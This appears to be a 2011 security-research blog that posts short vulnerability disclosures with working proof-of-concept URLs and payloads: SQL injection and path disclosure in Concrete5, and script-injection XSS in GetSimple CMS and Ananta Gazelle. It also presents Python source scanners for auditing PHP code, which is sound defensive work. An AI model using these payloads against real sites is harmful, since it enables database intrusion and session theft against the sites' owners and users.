It's 3:44 AM ...
I connected my tool to a src audit (the next version of the script described a few posts ago) and one of the proxy programs.
Results: 23 vulnerabilities found: 6 SQL Injections and XSS (a few stored) and...
I will post it here as soon as the vendors answer me. And...
It's 3:46 AM... ;)
Monday, 21 November 2011
Saturday, 19 November 2011
SQLi/Info Disclo in Concrete 5.4.11
Another old bug...
# --------------------------------------------------------------------------- #
# - Title : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on : Ubuntu
# - Date : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. That's it!
* path disclosure is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .
GetSimple CMS 2.03.1 XSS
Some old info that I found on my other disk. Enjoy:
# --------------------------------------------------------------------------- #
# - Title : GetSimple CMS 2.03.1
# - Tested on : Ubuntu
# - Date : 24/27.o3.2o11
# - Download Link : @sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
Thu, 24 Mar 2011, 22:05:57 CET
Get Simple CMS 2.03.1
http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/edit.php
'Create New Page'
post "><script> in the title and view the page
27.o3.2o11 GetSimple 2.03.1 XSS for logged-in users (http://www.cagintranetworks.com/)
http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/theme.php
vulnerable param:
$template="><script>alert(2)</script>
regards,
Simple "scanner" from PentestMag
I decided to publish this simple source code scanner.
I sent it with an article to Pentest Magazine first, but now I'm working on a better version, so maybe this one will help somebody :)
The idea is simple: do some 'grep' tricks, and write the result as output.html :)
I will be glad if it helps someone to better understand Python :)
If you have any questions, feel free to ask.
# ---------------------------------------------------
# knewme.py @ 2o11 - v3
# ---------------------------------------------------
# This is a sample 'dirty hack' for php src audit.
#
# dated :
# xx.o9.2o11 + ...?
# 28.o9.2o11 + php files 'founded'
# 27.o9.2o11 + output.html
#            + project started
#----------------------------------------------------
# run: python knewme.py -d /dir/with/files/in/php/
#      python knewme.py -f /dir/with/file.php > output.html
# (vuln.php_list = one php function name per line, e.g. eval, system, mysql_query)
# hf o/
#
import sys      # argv, exit
import glob     # list files in a dir
import getopt   # opts implementation
import html     # escape source lines before dropping them into the html report

# --------------------------------------------------
# argvs
try:
    opts, args = getopt.getopt(sys.argv[1:], "hd:f:v", ["help", "dir=", "file="])
except getopt.GetoptError as err:
    print(str(err))
    print("Ups... ;C Try with -h;)")
    sys.exit(2)

verbose = False
for o, a in opts:
    if o == "-v":
        verbose = True
    elif o in ("-h", "--help"):
        print("")
        print("\t-----------------------------")
        print("\t[<>] knewme.py @ 2o11.v3 [<>]")
        print("\t-----------------------------")
        print("try this way:")
        print("\t-d /dir/where/you/wanna/find/phps")
        print("\t-f /dir/where/is/your/file.php")
        print("\t-h thats me!")
        print("\n[~] try again ;)")
        sys.exit()
    elif o in ("-d", "--dir"):
        path = a + "*.php"                     # the option value, not argv[2]; glob() finds the .phps (28.o9)
        with open('dir_check.log', 'w') as logfile:
            for stri in glob.glob(path):
                logfile.write(stri + "\n")     # one found file per line in $logfile
        print("[+] List of php files founded at " + path + " are noted in [dir_check.log]")
        print("[i] You should test it manualy now.")
        sys.exit()
    elif o in ("-f", "--file"):
        path = a
        with open(path, 'r', errors='replace') as filek:   # read mode; closed after this block
            stri = filek.readlines()
        print(" <html><head><title> KnewMe Project @ 2011 - This is Your Report</title></head>")
        print(" <body><br>")
        print(" <center><b><h1> KnewMe Project @ 2011 <br></h1></b></center>")
        print("<b><p align=\"left\"><br>[+] Now checking file: " + html.escape(path) + "</p></b>")
        with open('vuln.php_list', 'r') as vulnlist:
            for vulnline in vulnlist:
                v = vulnline.strip()
                if not v:
                    continue
                print("<b><p align=\"left\">[+] Possible vulnerable function name is : <font color=\"red\"> " + html.escape(v) + " </font> </p></b>")
                print(" <table border=\"1\">")
                print(" <tr bgcolor=\"teal\">")
                print(" <th>line</th><th>check this</th>")
                print(" </tr>")
                i = 1
                for line in stri:              # for $line.find(?) in str=filedsk
                    if line.find(v) != -1:
                        print(" <tr bgcolor=\"white\">")
                        # escaped: a '<script>' inside the audited php must not run in the report itself
                        print(" <td> %d </td><td> %s </td>" % (i, html.escape(line.rstrip("\n"))))
                        print(" </tr>")
                    i += 1                     # count every line, not only the hits
                # ----------------------------------------------------------- end of for...
                print(" </table>")
                print("<b>---------------[ END of this test HERE ] ---------------</b><br>")
        # -------------------------------------------------------------------- end of for...
        print("</body></html>")                # closed once, after all tests (was printed per hit)
        # -- end of last elif
    else:
        assert False, "unhandled option"
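The grep approach above only tells you that a dangerous function name appears somewhere in the file. The next step a code auditor usually wants is to see whether request data actually reaches that function, which is what turns the Concrete5 ORDER BY parameter and the GetSimple page title into bugs. The following is an added example of my own, not the knewme.py script and not code from any project mentioned on this page: a small taint-style scanner that marks php variables assigned from superglobals and reports the lines where they (or the superglobals themselves) reach a sink. The sink and sanitizer lists are chosen for the example and are deliberately short and naive; the php snippet at the bottom is constructed and only loosely shaped like the two bugs above.

```python
"""Taint-style php source scanner (added example, not knewme.py)."""
import html
import re
import sys

# request superglobals = where attacker-controlled data enters
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
# sink -> class of bug it turns tainted input into (list chosen for this example)
SINKS = {
    "mysql_query": "sqli", "mysqli_query": "sqli", "pg_query": "sqli",
    "echo": "xss", "print": "xss",
    "eval": "code-exec", "system": "cmd-exec", "exec": "cmd-exec", "passthru": "cmd-exec",
    "include": "file-include", "require": "file-include",
}
# a right-hand side containing one of these is treated as cleaned (deliberately naive
# and context-blind: htmlspecialchars() helps against xss, not against sqli or cmd-exec)
SANITIZERS = ("intval(", "(int)", "htmlspecialchars(", "mysql_real_escape_string(")

ASSIGN = re.compile(r"^\s*(\$[A-Za-z_]\w*)\s*(\.?=)(?!=)(.*)$")   # $x = ... / $x .= ...
VARREF = re.compile(r"\$[A-Za-z_]\w*")
SINK_RE = re.compile(r"\b(" + "|".join(map(re.escape, SINKS)) + r")\b")


def tainted_refs(expr, tainted):
    """Superglobals and tainted variables referenced in expr, in order, without duplicates."""
    refs = ["$_" + g for g in SOURCES.findall(expr)]
    refs += [v for v in VARREF.findall(expr) if v in tainted]
    return list(dict.fromkeys(refs))


def scan_php(src):
    """Return findings as dicts with line, sink, kind and via (what carried the taint)."""
    tainted = set()                            # variables currently holding request data
    findings = []
    for n, raw in enumerate(src.splitlines(), 1):
        code = raw.split("//", 1)[0]           # drop trailing // comment (naive: also cuts URLs)
        m = ASSIGN.match(code)
        if m:
            lhs, op, rhs = m.groups()
            if any(s in rhs for s in SANITIZERS):
                if op == "=":
                    tainted.discard(lhs)       # plain assignment from a cleaned value
            elif tainted_refs(rhs, tainted):
                tainted.add(lhs)               # taint propagates, also through .= appends
            elif op == "=":
                tainted.discard(lhs)           # overwritten with clean data
        for s in SINK_RE.finditer(code):
            via = tainted_refs(code[s.end():], tainted)
            if via:
                findings.append({"line": n, "sink": s.group(1),
                                 "kind": SINKS[s.group(1)], "via": via})
    return findings


def to_html(findings):
    """Small output.html in the spirit of knewme.py; everything taken from the source is escaped."""
    rows = "".join(
        "<tr><td>%d</td><td>%s</td><td>%s</td><td>%s</td></tr>"
        % (f["line"], f["sink"], f["kind"], html.escape(", ".join(f["via"])))
        for f in findings)
    return ("<html><body><table border=\"1\"><tr><th>line</th><th>sink</th>"
            "<th>kind</th><th>tainted by</th></tr>" + rows + "</table></body></html>")


# constructed php sample (not from any real project), loosely shaped like the
# order-by and page-title bugs described above
SAMPLE_PHP = r"""<?php
// constructed sample
$dir = $_GET['ccm_order_dir'];
$col = $_GET['ccm_order_by'];
$id = intval($_GET['id']);
$title = $_POST['title'];
$safe_title = htmlspecialchars($title);
$sql = "SELECT * FROM Files WHERE fID = $id ORDER BY $col $dir";
mysql_query($sql);
echo "<h1>" . $title . "</h1>";
echo "<h1>" . $safe_title . "</h1>";
"""

if __name__ == "__main__":
    src = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_PHP
    for f in scan_php(src):
        print("line %d: %s -> %s via %s" % (f["line"], f["sink"], f["kind"], ", ".join(f["via"])))
```

Run without arguments it scans the built-in sample and reports line 9 (mysql_query fed by $sql, which inherited its taint from $col and $dir) and line 10 (echo of the raw $title), while the intval() and htmlspecialchars() lines stay quiet. The sanitizer check is the weak spot: it only looks for a function name on the right-hand side, so it cannot tell an html escape from an sql escape, and a real tool has to pair each sanitizer with the sink class it actually protects.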
Monday, 14 November 2011
Ananta Gazelle1.0 CMS XSS
This is a very nice CMS. But there is a nice XSS too ;)
Go to:
http://Ananta_Gazelle1.0/search.php?lookup=">:)<here:)>alert(1)</here:)>